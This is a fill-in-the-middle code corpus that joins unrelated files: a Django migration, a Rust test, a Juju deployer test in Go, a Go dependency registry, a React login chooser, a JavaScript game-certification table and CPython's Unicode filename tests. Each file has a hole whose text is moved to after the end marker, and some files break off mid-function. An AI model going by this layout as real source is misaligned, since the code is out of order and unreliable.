('news_duration_date_start', models.DateTimeField(blank=True, null=True)),
('news_duration_date_end', models.DateTimeField(blank=True, null=True)),
('contests_duration_date_start', models.DateTimeField(blank=True, null=True)),
('contests_duration_date_end', models.DateTimeField(blank=True, null=True)),
('max_answers_per_question', models.PositiveSmallIntegerField(default=1, validators=[django.core.validators.MinValueValidator(1)])),
('map_radius', models.PositiveSmallIntegerField(default=500, validators=[django.core.validators.MinValueValidator(1)])),
('admin_email', models.CharField(default='[email protected]', max_length=100)),
('messages_new_account', models.TextField(blank=True, null=True)),
('messages_new_contest', models.TextField(blank=True, null=True)),
('messages_new_loyalty_item', models.TextField(blank=True, null=True)),
('messages_winner', models.TextField(blank=True, null=True)),
('last_update_datetime', models.DateTimeField(blank=True, null=True)),
('claiming_method', models.CharField(blank=True, max_length=200, null=True)),
('country', models.CharField(blank=True, choices=[('indonesia', 'Indonesia'), ('malaysia', 'Malaysia'), ('philippines', 'Philippines'), ('singapore', 'Singapore')], default='Philippines', max_length=15)),
('salesrep_no', models.CharField(blank=True, max_length=200, null=True)),
('last_update_by_author', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'cms_policy',
'verbose_name_plural': 'Policies',
},
),
]<|fim▁end|>
|
from django.db import migrations, models
import django.db.models.deletion
|
<|file_name|>metadata-sufficient-for-layout.rs<|end_file_name|><|fim▁begin|>// compile-flags: --emit metadata
#![feature(generators, generator_trait)]
use std::marker::Unpin;
use std::ops::Generator;
pub fn g() -> impl Generator<(), Yield = (), Return = ()> {
|| {<|fim▁hole|> yield;
}
}<|fim▁end|>
| |
<|file_name|>simple_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package deployer_test
import (
"encoding/json"
"io/ioutil"<|fim▁hole|> "sort"
jc "github.com/juju/testing/checkers"
"github.com/juju/utils/arch"
"github.com/juju/utils/series"
"github.com/juju/version"
gc "gopkg.in/check.v1"
"gopkg.in/juju/names.v2"
"github.com/juju/juju/agent"
"github.com/juju/juju/agent/tools"
svctesting "github.com/juju/juju/service/common/testing"
"github.com/juju/juju/service/upstart"
"github.com/juju/juju/state/multiwatcher"
"github.com/juju/juju/testing"
coretools "github.com/juju/juju/tools"
jujuversion "github.com/juju/juju/version"
"github.com/juju/juju/worker/deployer"
)
var quote, cmdSuffix string
func init() {
quote = "'"
if runtime.GOOS == "windows" {
cmdSuffix = ".exe"
quote = `"`
}
}
type SimpleContextSuite struct {
SimpleToolsFixture
}
var _ = gc.Suite(&SimpleContextSuite{})
func (s *SimpleContextSuite) SetUpTest(c *gc.C) {
s.SimpleToolsFixture.SetUp(c, c.MkDir())
}
func (s *SimpleContextSuite) TearDownTest(c *gc.C) {
s.SimpleToolsFixture.TearDown(c)
}
func (s *SimpleContextSuite) TestDeployRecall(c *gc.C) {
mgr0 := s.getContext(c)
units, err := mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
err = mgr0.DeployUnit("foo/123", "some-password")
c.Assert(err, jc.ErrorIsNil)
units, err = mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.DeepEquals, []string{"foo/123"})
s.assertUpstartCount(c, 1)
s.checkUnitInstalled(c, "foo/123", "some-password")
err = mgr0.RecallUnit("foo/123")
c.Assert(err, jc.ErrorIsNil)
units, err = mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
s.checkUnitRemoved(c, "foo/123")
}
func (s *SimpleContextSuite) TestOldDeployedUnitsCanBeRecalled(c *gc.C) {
// After r1347 deployer tag is no longer part of the upstart conf filenames,
// now only the units' tags are used. This change is with the assumption only
// one deployer will be running on a machine (in the machine agent as a task,
// unlike before where there was one in the unit agent as well).
// This test ensures units deployed previously (or their upstart confs more
// specifically) can be detected and recalled by the deployer.
manager := s.getContext(c)
// No deployed units at first.
units, err := manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
// Trying to recall any units will fail.
err = manager.RecallUnit("principal/1")
c.Assert(err, gc.ErrorMatches, `unit "principal/1" is not deployed`)
// Simulate some previously deployed units with the old
// upstart conf filename format (+deployer tags).
s.injectUnit(c, "jujud-machine-0:unit-mysql-0", "unit-mysql-0")
s.assertUpstartCount(c, 1)
s.injectUnit(c, "jujud-unit-wordpress-0:unit-nrpe-0", "unit-nrpe-0")
s.assertUpstartCount(c, 2)
// Make sure we can discover them.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 2)
sort.Strings(units)
c.Assert(units, gc.DeepEquals, []string{"mysql/0", "nrpe/0"})
// Deploy some units.
err = manager.DeployUnit("principal/1", "some-password")
c.Assert(err, jc.ErrorIsNil)
s.checkUnitInstalled(c, "principal/1", "some-password")
s.assertUpstartCount(c, 3)
err = manager.DeployUnit("subordinate/2", "fake-password")
c.Assert(err, jc.ErrorIsNil)
s.checkUnitInstalled(c, "subordinate/2", "fake-password")
s.assertUpstartCount(c, 4)
// Verify the newly deployed units are also discoverable.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 4)
sort.Strings(units)
c.Assert(units, gc.DeepEquals, []string{"mysql/0", "nrpe/0", "principal/1", "subordinate/2"})
// Recall all of them - should work ok.
unitCount := 4
for _, unitName := range units {
err = manager.RecallUnit(unitName)
c.Assert(err, jc.ErrorIsNil)
unitCount--
s.checkUnitRemoved(c, unitName)
s.assertUpstartCount(c, unitCount)
}
// Verify they're no longer discoverable.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
}
type SimpleToolsFixture struct {
dataDir string
logDir string
origPath string
binDir string
data *svctesting.FakeServiceData
}
var fakeJujud = "#!/bin/bash --norc\n# fake-jujud\nexit 0\n"
func (fix *SimpleToolsFixture) SetUp(c *gc.C, dataDir string) {
fix.dataDir = dataDir
fix.logDir = c.MkDir()
current := version.Binary{
Number: jujuversion.Current,
Arch: arch.HostArch(),
Series: series.HostSeries(),
}
toolsDir := tools.SharedToolsDir(fix.dataDir, current)
err := os.MkdirAll(toolsDir, 0755)
c.Assert(err, jc.ErrorIsNil)
jujudPath := filepath.Join(toolsDir, "jujud")
err = ioutil.WriteFile(jujudPath, []byte(fakeJujud), 0755)
c.Assert(err, jc.ErrorIsNil)
toolsPath := filepath.Join(toolsDir, "downloaded-tools.txt")
testTools := coretools.Tools{Version: current, URL: "http://testing.invalid/tools"}
data, err := json.Marshal(testTools)
c.Assert(err, jc.ErrorIsNil)
err = ioutil.WriteFile(toolsPath, data, 0644)
c.Assert(err, jc.ErrorIsNil)
fix.binDir = c.MkDir()
fix.origPath = os.Getenv("PATH")
os.Setenv("PATH", fix.binDir+":"+fix.origPath)
fix.makeBin(c, "status", `echo "blah stop/waiting"`)
fix.makeBin(c, "stopped-status", `echo "blah stop/waiting"`)
fix.makeBin(c, "started-status", `echo "blah start/running, process 666"`)
fix.makeBin(c, "start", "cp $(which started-status) $(which status)")
fix.makeBin(c, "stop", "cp $(which stopped-status) $(which status)")
fix.data = svctesting.NewFakeServiceData()
}
func (fix *SimpleToolsFixture) TearDown(c *gc.C) {
os.Setenv("PATH", fix.origPath)
}
func (fix *SimpleToolsFixture) makeBin(c *gc.C, name, script string) {
path := filepath.Join(fix.binDir, name)
err := ioutil.WriteFile(path, []byte("#!/bin/bash --norc\n"+script), 0755)
c.Assert(err, jc.ErrorIsNil)
}
func (fix *SimpleToolsFixture) assertUpstartCount(c *gc.C, count int) {
c.Assert(fix.data.InstalledNames(), gc.HasLen, count)
}
func (fix *SimpleToolsFixture) getContext(c *gc.C) *deployer.SimpleContext {
config := agentConfig(names.NewMachineTag("99"), fix.dataDir, fix.logDir)
return deployer.NewTestSimpleContext(config, fix.logDir, fix.data)
}
func (fix *SimpleToolsFixture) getContextForMachine(c *gc.C, machineTag names.Tag) *deployer.SimpleContext {
config := agentConfig(machineTag, fix.dataDir, fix.logDir)
return deployer.NewTestSimpleContext(config, fix.logDir, fix.data)
}
func (fix *SimpleToolsFixture) paths(tag names.Tag) (agentDir, toolsDir string) {
agentDir = agent.Dir(fix.dataDir, tag)
toolsDir = tools.ToolsDir(fix.dataDir, tag.String())
return
}
func (fix *SimpleToolsFixture) checkUnitInstalled(c *gc.C, name, password string) {
tag := names.NewUnitTag(name)
svcName := "jujud-" + tag.String()
assertContains(c, fix.data.InstalledNames(), svcName)
svcConf := fix.data.GetInstalled(svcName).Conf()
// TODO(ericsnow) For now we just use upstart serialization.
uconfData, err := upstart.Serialize(svcName, svcConf)
c.Assert(err, jc.ErrorIsNil)
uconf := string(uconfData)
regex := regexp.MustCompile("(?m)(?:^\\s)*exec\\s.+$")
execs := regex.FindAllString(uconf, -1)
	if execs == nil {
		c.Fatalf("no command found in conf:\n%s", uconf)
	} else if len(execs) > 1 {
		c.Fatalf("Test is not built to handle more than one exec line.")
	}
_, toolsDir := fix.paths(tag)
jujudPath := filepath.Join(toolsDir, "jujud"+cmdSuffix)
logPath := filepath.Join(fix.logDir, tag.String()+".log")
for _, pat := range []string{
"^exec " + quote + jujudPath + quote + " unit ",
" --unit-name " + name + " ",
" >> " + logPath + " 2>&1$",
} {
match, err := regexp.MatchString(pat, execs[0])
c.Assert(err, jc.ErrorIsNil)
if !match {
c.Fatalf("failed to match:\n%s\nin:\n%s", pat, execs[0])
}
}
conf, err := agent.ReadConfig(agent.ConfigPath(fix.dataDir, tag))
c.Assert(err, jc.ErrorIsNil)
c.Assert(conf.Tag(), gc.Equals, tag)
c.Assert(conf.DataDir(), gc.Equals, fix.dataDir)
jujudData, err := ioutil.ReadFile(jujudPath)
c.Assert(err, jc.ErrorIsNil)
c.Assert(string(jujudData), gc.Equals, fakeJujud)
}
func (fix *SimpleToolsFixture) checkUnitRemoved(c *gc.C, name string) {
assertNotContains(c, fix.data.InstalledNames(), name)
tag := names.NewUnitTag(name)
agentDir, toolsDir := fix.paths(tag)
for _, path := range []string{agentDir, toolsDir} {
_, err := ioutil.ReadFile(path)
if err == nil {
c.Logf("Warning: %q not removed as expected", path)
} else {
c.Assert(err, jc.Satisfies, os.IsNotExist)
}
}
}
func (fix *SimpleToolsFixture) injectUnit(c *gc.C, name, unitTag string) {
fix.data.SetStatus(name, "installed")
toolsDir := filepath.Join(fix.dataDir, "tools", unitTag)
err := os.MkdirAll(toolsDir, 0755)
c.Assert(err, jc.ErrorIsNil)
}
type mockConfig struct {
agent.Config
tag names.Tag
datadir string
logdir string
upgradedToVersion version.Number
jobs []multiwatcher.MachineJob
}
func (mock *mockConfig) Tag() names.Tag {
return mock.tag
}
func (mock *mockConfig) DataDir() string {
return mock.datadir
}
func (mock *mockConfig) LogDir() string {
return mock.logdir
}
func (mock *mockConfig) Jobs() []multiwatcher.MachineJob {
return mock.jobs
}
func (mock *mockConfig) UpgradedToVersion() version.Number {
return mock.upgradedToVersion
}
func (mock *mockConfig) WriteUpgradedToVersion(newVersion version.Number) error {
mock.upgradedToVersion = newVersion
return nil
}
func (mock *mockConfig) Model() names.ModelTag {
return testing.ModelTag
}
func (mock *mockConfig) Controller() names.ControllerTag {
return testing.ControllerTag
}
func (mock *mockConfig) CACert() string {
return testing.CACert
}
func (mock *mockConfig) Value(_ string) string {
return ""
}
func agentConfig(tag names.Tag, datadir, logdir string) agent.Config {
return &mockConfig{tag: tag, datadir: datadir, logdir: logdir}
}
// assertContains asserts a needle is contained within haystack
func assertContains(c *gc.C, haystack []string, needle string) {
c.Assert(contains(haystack, needle), jc.IsTrue)
}
// assertNotContains asserts a needle is not contained within haystack
func assertNotContains(c *gc.C, haystack []string, needle string) {
c.Assert(contains(haystack, needle), gc.Not(jc.IsTrue))
}
func contains(haystack []string, needle string) bool {
for _, e := range haystack {
if e == needle {
return true
}
}
return false
}<|fim▁end|>
|
"os"
"path/filepath"
"regexp"
"runtime"
|
<|file_name|>depends.go<|end_file_name|><|fim▁begin|>package depends
import (
"fmt"
"sync"
logutil "github.com/docker/infrakit/pkg/log"
"github.com/docker/infrakit/pkg/types"
)
var log = logutil.New("module", "run/depends")
// ParseDependsFunc returns a list of dependencies of this spec.
type ParseDependsFunc func(types.Spec) (Runnables, error)
var (
parsers = map[string]map[types.InterfaceSpec]ParseDependsFunc{}
lock = sync.RWMutex{}
)
// Register registers a helper for parsing dependencies based on a key (e.g. 'group')
// and interface spec (Group/1.0)
func Register(key string, interfaceSpec types.InterfaceSpec, f ParseDependsFunc) {
lock.Lock()
defer lock.Unlock()
if _, has := parsers[key]; !has {
parsers[key] = map[types.InterfaceSpec]ParseDependsFunc{}
}
if _, has := parsers[key][interfaceSpec]; has {
		panic(fmt.Errorf("duplicate dependency parser for %v / %v", key, interfaceSpec))
}
parsers[key][interfaceSpec] = f
}
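
// Illustrative registration (not from the original source): a plugin package
// would typically call Register from an init function, passing whatever
// InterfaceSpec it implements together with its own parser; the two names
// below are hypothetical.
//
//	func init() {
//		Register("group", groupInterfaceSpec, parseGroupDepends)
//	}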
// Resolve returns the dependencies listed in the spec as well as inside the properties.
// InterfaceSpec is optional. If nil, the first match by key (kind) is used. If nothing is registered, returns nil
// and no error. Error is returned for exceptions (eg. parsing, etc.)
func Resolve(spec types.Spec, key string, interfaceSpec *types.InterfaceSpec) (Runnables, error) {
lock.RLock()
defer lock.RUnlock()
m, has := parsers[key]
if !has {
return nil, nil
}
if interfaceSpec == nil {<|fim▁hole|> // First match
return parse(spec)
}
}
parse, has := m[*interfaceSpec]
if !has {
return nil, nil
}
return parse(spec)
}<|fim▁end|>
|
for _, parse := range m {
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from ..version_info import PY2
if PY2:
from . import dumb, gnu, ndbm
from whichdb import *
from anydbm import *<|fim▁end|>
|
from __future__ import absolute_import
from dbm import *
|
<|file_name|>Main.js<|end_file_name|><|fim▁begin|>import React from 'react';
import PropTypes from 'prop-types';
import Button from 'components/Button';
Main.propTypes = {
showLoginForm: PropTypes.func.isRequired,
showSignUpForm: PropTypes.func.isRequired
};
export default function Main({ showLoginForm, showSignUpForm }) {
return (
<main><|fim▁hole|> onClick={showLoginForm}
>
Yes, I have an account
</Button>
<Button
color="pink"
style={{ marginTop: '1.5rem', fontSize: '2rem', padding: '1rem' }}
onClick={showSignUpForm}
>
{"No, I'm a new user. Make me a new account, please!"}
</Button>
</main>
);
}<|fim▁end|>
|
<Button
color="logoBlue"
style={{ display: 'block', fontSize: '2.5rem', padding: '1rem' }}
|
<|file_name|>qualifications.js<|end_file_name|><|fim▁begin|>/* exported Qualifications */
function Qualifications(skills, items) {
var requirements = {
'soldier': {
meta: {
passPercentage: 100
},
classes: {
'Heavy Assault': {
certifications: [
{ skill: skills.heavyAssault.flakArmor, level: 3 }
],
equipment: []
},
'Light Assault': {
certifications: [
{ skill: skills.lightAssault.flakArmor, level: 3 }
],
equipment: []
},
'Engineer': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 3 },
{ skill: skills.engineer.nanoArmorKit, level: 4 },
{ skill: skills.engineer.tankMine, level: 1 }
],
equipment: []
},
'Medic': {
certifications: [
{ skill: skills.medic.flakArmor, level: 3 },
{ skill: skills.medic.medicalApplicator, level: 4 }
],
equipment: []
},
'Infiltrator': {
certifications: [
{ skill: skills.infiltrator.flakArmor, level: 3 }
],
equipment: []
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.advancedMobileStation, level: 1 }
],
equipment: []
},
'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.priorityDeployment, level: 0 }
],
equipment: []
}
}
},
'veteran': {
meta: {
passPercentage: 100
},
classes: {
'Heavy Assault': {
certifications: [
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.antiVehicleGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 1 }
],
equipment: []
},
'Light Assault': {
certifications: [
{ skill: skills.lightAssault.c4, level: 2 },
{ skill: skills.lightAssault.drifterJumpJets, level: 2 }
],
equipment: []
},
'Engineer': {
certifications: [
{ skill: skills.engineer.nanoArmorKit, level: 6 },
{ skill: skills.engineer.claymoreMine, level: 2 },
{ skill: skills.engineer.tankMine, level: 2 },
{ skill: skills.engineer.ammunitionPackage, level: 3 },
{ skill: skills.engineer.stickyGrenade, level: 1 }
],
equipment: [
items.weapon.trac5s,
items.engineer.avManaTurret
]
},
'Medic': {
certifications: [
{ skill: skills.medic.medicalApplicator, level: 6 },
{ skill: skills.medic.nanoRegenDevice, level: 6 }
],
equipment: []
},
'Infiltrator': {
certifications: [
{ skill: skills.infiltrator.advancedEquipmentTerminalHacking, level: 3 }
],
equipment: []
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.vehicleAmmoDispenser, level: 1 },
{ skill: skills.sunderer.blockadeArmor, level: 3 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 2 }
],<|fim▁hole|> 'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.priorityDeployment, level: 2 }
],
equipment: []
}
}
},
'medic': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Offensive Medic': {
certifications: [
{ skill: skills.medic.grenadeBandolier, level: 2 },
{ skill: skills.medic.naniteReviveGrenade, level: 1 },
{ skill: skills.medic.nanoRegenDevice, level: 6 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: []
},
'Loadout: Defensive Medic': {
certifications: [
{ skill: skills.medic.flakArmor, level: 4 },
{ skill: skills.medic.naniteReviveGrenade, level: 1 },
{ skill: skills.medic.regenerationField, level: 5 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: []
}
}
},
'engineer': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry MANA Turret': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 4 },
{ skill: skills.engineer.claymoreMine, level: 2 }
],
equipment: [
items.weapon.trac5s
]
},
'Loadout: Anti-Vehicle MANA Turret': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 4 },
{ skill: skills.engineer.tankMine, level: 2 },
{ skill: skills.engineer.avManaTurret, level: 1 }
],
equipment: [
items.weapon.trac5s,
items.engineer.avManaTurret
]
}
}
},
'lightAssault': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Bounty Hunter': {
certifications: [
{ skill: skills.lightAssault.flakArmor, level: 4 },
{ skill: skills.lightAssault.jumpJets, level: 6 },
{ skill: skills.lightAssault.flashGrenade, level: 1 }
],
equipment: []
},
'Loadout: Death From Above': {
certifications: [
{ skill: skills.lightAssault.grenadeBandolier, level: 2 },
{ skill: skills.lightAssault.drifterJumpJets, level: 5 },
{ skill: skills.lightAssault.smokeGrenade, level: 1 }
],
equipment: []
}
}
},
'infiltrator': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Close Quarters': {
certifications: [
{ skill: skills.infiltrator.flakArmor, level: 4 },
{ skill: skills.infiltrator.grenadeBandolier, level: 2 },
{ skill: skills.infiltrator.reconDetectDevice, level: 6 },
{ skill: skills.infiltrator.claymoreMine, level: 2 },
{ skill: skills.infiltrator.empGrenade, level: 1 }
],
equipment: [
items.weapon.ns7pdw
]
},
'Loadout: Assassin': {
certifications: [
{ skill: skills.infiltrator.ammunitionBelt, level: 3 },
{ skill: skills.infiltrator.motionSpotter, level: 5 },
{ skill: skills.infiltrator.claymoreMine, level: 2 },
{ skill: skills.infiltrator.decoyGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: [
items.weapon.rams
]
}
}
},
'heavyAssault': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry': {
certifications: [
{ skill: skills.heavyAssault.grenadeBandolier, level: 2 },
{ skill: skills.heavyAssault.flakArmor, level: 4 },
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.concussionGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: [
items.weapon.decimator
]
},
'Loadout: Anti-Armor': {
certifications: [
{ skill: skills.heavyAssault.flakArmor, level: 4 },
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.c4, level: 1 },
{ skill: skills.heavyAssault.antiVehicleGrenade, level: 1 }
],
equipment: [
items.weapon.skep,
items.weapon.grounder
]
}
}
},
'maxUnit': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry': {
certifications: [
{ skill: skills.max.kineticArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftMercy,
items.max.rightMercy
]
},
'Loadout: Anti-Armor': {
certifications: [
{ skill: skills.max.flakArmor, level: 5 },
{ skill: skills.max.kineticArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftPounder,
items.max.rightPounder
]
},
'Loadout: Anti-Air': {
certifications: [
{ skill: skills.max.flakArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftBurster,
items.max.rightBurster
]
}
}
},
'basicTanks': {
meta: {
passPercentage: 100
},
classes: {
'Prowler': {
certifications: [
{ skill: skills.prowler.anchoredMode, level: 1 }
],
equipment: [
items.prowler.walker
]
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.vehicleAmmoDispenser, level: 1 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 2 }
],
equipment: []
}
}
},
'sunderer': {
meta: {
passPercentage: 100
},
classes: {
'Sunderer': {
certifications: [
{ skill: skills.sunderer.mineGuard, level: 4 },
{ skill: skills.sunderer.blockadeArmor, level: 4 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 3 },
{ skill: skills.sunderer.naniteProximityRepairSystem, level: 6 }
],
equipment: []
}
}
},
'prowler': {
meta: {
passPercentage: 100
},
classes: {
'Prowler': {
certifications: [
{ skill: skills.prowler.anchoredMode, level: 4 },
{ skill: skills.prowler.mineGuard, level: 4 }
],
equipment: [
items.prowler.p2120ap,
items.prowler.halberd
]
}
}
},
'lightning': {
meta: {
passPercentage: 100
},
classes: {
'Lightning': {
certifications: [
{ skill: skills.lightning.reinforcedTopArmor, level: 1 }
],
equipment: [
items.lightning.skyguard
]
}
}
},
'harasser': {
meta: {
passPercentage: 100
},
classes: {
'Harasser': {
certifications: [
{ skill: skills.harasser.fireSuppressionSystem, level: 4 },
{ skill: skills.harasser.compositeArmor, level: 4 },
{ skill: skills.harasser.turbo, level: 5 }
],
equipment: [
items.harasser.halberd
]
}
}
},
'commander': {
meta: {
passPercentage: 100
},
classes: {
'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.commandCommChannel, level: 1 },
{ skill: skills.squadLeader.requestReinforcements, level: 1 },
{ skill: skills.squadLeader.rallyPointGreen, level: 1 },
{ skill: skills.squadLeader.rallyPointOrange, level: 1 },
{ skill: skills.squadLeader.rallyPointPurple, level: 1 },
{ skill: skills.squadLeader.rallyPointYellow, level: 1 },
{ skill: skills.squadLeader.priorityDeployment, level: 4 }
],
equipment: []
}
}
}
},
echoHavoc = qual('Echo Havoc', null, null, true),
max = qual('MAX', echoHavoc, requirements.maxUnit),
heavyAssault = qual('Heavy Assault', max, requirements.heavyAssault),
echoCovertOps = qual('Echo Covert Ops', null, null, true),
infiltrator = qual('Infiltrator', echoCovertOps, requirements.infiltrator),
lightAssault = qual('Light Assault', infiltrator, requirements.lightAssault),
echoSpecialist = qual('Echo Specialist', null, null, true),
engineer = qual('Engineer', echoSpecialist, requirements.engineer),
combatMedic = qual('Combat Medic', engineer, requirements.medic),
commander = qual('Commander', null, requirements.commander, true),
sunderer = qual('Sunderer', [ echoSpecialist, echoCovertOps, echoHavoc ], requirements.sunderer),
harasser = qual('Harasser', null, requirements.harasser),
lightning = qual('Lightning', harasser, requirements.lightning),
prowler = qual('Prowler', lightning, requirements.prowler),
basicTanks = qual('Basic Tanks', [ sunderer, prowler ], requirements.basicTanks),
veteran = qual('Veteran', [ combatMedic, lightAssault, heavyAssault, commander ], requirements.veteran, true),
soldier = qual('Soldier', [ veteran, basicTanks ], requirements.soldier, true);
addParentRelationships(soldier);
return soldier;
function qual(name, child, certs, isRank) {
var obj = {};
obj.name = name;
if (child) {
if ($.isArray(child)) {
obj.child = child;
} else {
obj.child = [ child ];
}
}
if (certs) {
obj.cert = certs;
}
if (isRank) {
obj.isRank = true;
}
return obj;
}
function addParentRelationships(rank, parent) {
if (parent) {
if (rank.parent) {
rank.parent.push(parent);
} else {
rank.parent = [ parent ];
}
}
if (rank.child) {
$.each(rank.child, function() {
addParentRelationships(this, rank);
});
}
}
}<|fim▁end|>
|
equipment: []
},
|
<|file_name|>audioRecorder.d.ts<|end_file_name|><|fim▁begin|>import JitsiConference from '../../JitsiConference';
import JitsiTrack from '../RTC/JitsiTrack';
export class AudioRecorder {
constructor( jitsiConference: JitsiConference );
determineCorrectFileType: unknown; // TODO:
addTrack: ( track: JitsiTrack ) => void;
instantiateTrackRecorder: ( track: JitsiTrack ) => void;
removeTrack: ( track: JitsiTrack ) => void;
updateNames: () => void;<|fim▁hole|> getFileType: () => string;
}<|fim▁end|>
|
start: () => void;
stop: () => void;
download: () => void;
getRecordingResults: () => Array<unknown>; // TODO:
|
<|file_name|>test_pep277.py<|end_file_name|><|fim▁begin|># Test the Unicode versions of normal file functions
# open, os.open, os.stat. os.listdir, os.rename, os.remove, os.mkdir, os.chdir, os.rmdir
import sys, os, unittest
from unicodedata import normalize
from test import test_support
filenames = [
'1_abc',
u'2_ascii',
u'3_Gr\xfc\xdf-Gott',
u'4_\u0393\u03b5\u03b9\u03ac-\u03c3\u03b1\u03c2',
u'5_\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435',
u'6_\u306b\u307d\u3093',
u'7_\u05d4\u05e9\u05e7\u05e6\u05e5\u05e1',
u'8_\u66e8\u66e9\u66eb',
u'9_\u66e8\u05e9\u3093\u0434\u0393\xdf',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
u'10_\u1fee\u1ffd',
]
# Mac OS X decomposes Unicode names, using Normal Form D.
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
# "However, most volume formats do not follow the exact specification for
# these normal forms. For example, HFS Plus uses a variant of Normal Form D
# in which U+2000 through U+2FFF, U+F900 through U+FAFF, and U+2F800 through
# U+2FAFF are not decomposed."
if sys.platform != 'darwin':
filenames.extend([
# Specific code points: NFC(fn), NFD(fn), NFKC(fn) and NFKD(fn) all differents
u'11_\u0385\u03d3\u03d4',
u'12_\u00a8\u0301\u03d2\u0301\u03d2\u0308', # == NFD(u'\u0385\u03d3\u03d4')
u'13_\u0020\u0308\u0301\u038e\u03ab', # == NFKC(u'\u0385\u03d3\u03d4')
u'14_\u1e9b\u1fc1\u1fcd\u1fce\u1fcf\u1fdd\u1fde\u1fdf\u1fed',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
u'15_\u1fee\u1ffd\ufad1',
u'16_\u2000\u2000\u2000A',
u'17_\u2001\u2001\u2001A',
u'18_\u2003\u2003\u2003A', # == NFC(u'\u2001\u2001\u2001A')
u'19_\u0020\u0020\u0020A', # u'\u0020' == u' ' == NFKC(u'\u2000') ==
# NFKC(u'\u2001') == NFKC(u'\u2003')
])
# Is it Unicode-friendly?
if not os.path.supports_unicode_filenames:
fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
try:
for name in filenames:
name.encode(fsencoding)
except UnicodeEncodeError:
raise unittest.SkipTest("only NT+ and systems with "
"Unicode-friendly filesystem encoding")
# Destroy directory dirname and all files under it, to one level.
def deltree(dirname):
# Don't hide legitimate errors: if one of these suckers exists, it's
# an error if we can't remove it.
if os.path.exists(dirname):
# must pass unicode to os.listdir() so we get back unicode results.
for fname in os.listdir(unicode(dirname)):
os.unlink(os.path.join(dirname, fname))
os.rmdir(dirname)
class UnicodeFileTests(unittest.TestCase):
files = set(filenames)
normal_form = None
def setUp(self):
try:
os.mkdir(test_support.TESTFN)
except OSError:
pass
files = set()
for name in self.files:
name = os.path.join(test_support.TESTFN, self.norm(name))
with open(name, 'w') as f:
f.write((name+'\n').encode("utf-8"))
os.stat(name)
files.add(name)
self.files = files
def tearDown(self):
deltree(test_support.TESTFN)
def norm(self, s):
if self.normal_form and isinstance(s, unicode):
return normalize(self.normal_form, s)
return s
def _apply_failure(self, fn, filename, expected_exception,
check_fn_in_exception = True):
with self.assertRaises(expected_exception) as c:
fn(filename)
exc_filename = c.exception.filename
# the "filename" exception attribute may be encoded
if isinstance(exc_filename, str):
filename = filename.encode(sys.getfilesystemencoding())
if check_fn_in_exception:
self.assertEqual(exc_filename, filename, "Function '%s(%r) failed "
"with bad filename in the exception: %r" %
(fn.__name__, filename, exc_filename))
def test_failures(self):
# Pass non-existing Unicode filenames all over the place.
for name in self.files:
name = "not_" + name
self._apply_failure(open, name, IOError)
self._apply_failure(os.stat, name, OSError)
self._apply_failure(os.chdir, name, OSError)
self._apply_failure(os.rmdir, name, OSError)
self._apply_failure(os.remove, name, OSError)
        # listdir may append a wildcard to the filename, so don't check
self._apply_failure(os.listdir, name, OSError, False)
def test_open(self):
for name in self.files:
f = open(name, 'w')
f.write((name+'\n').encode("utf-8"))
f.close()
os.stat(name)
<|fim▁hole|> # Skip the test on darwin, because darwin does normalize the filename to
# NFD (a variant of Unicode NFD form). Normalize the filename to NFC, NFKC,
# NFKD in Python is useless, because darwin will normalize it later and so
# open(), os.stat(), etc. don't raise any exception.
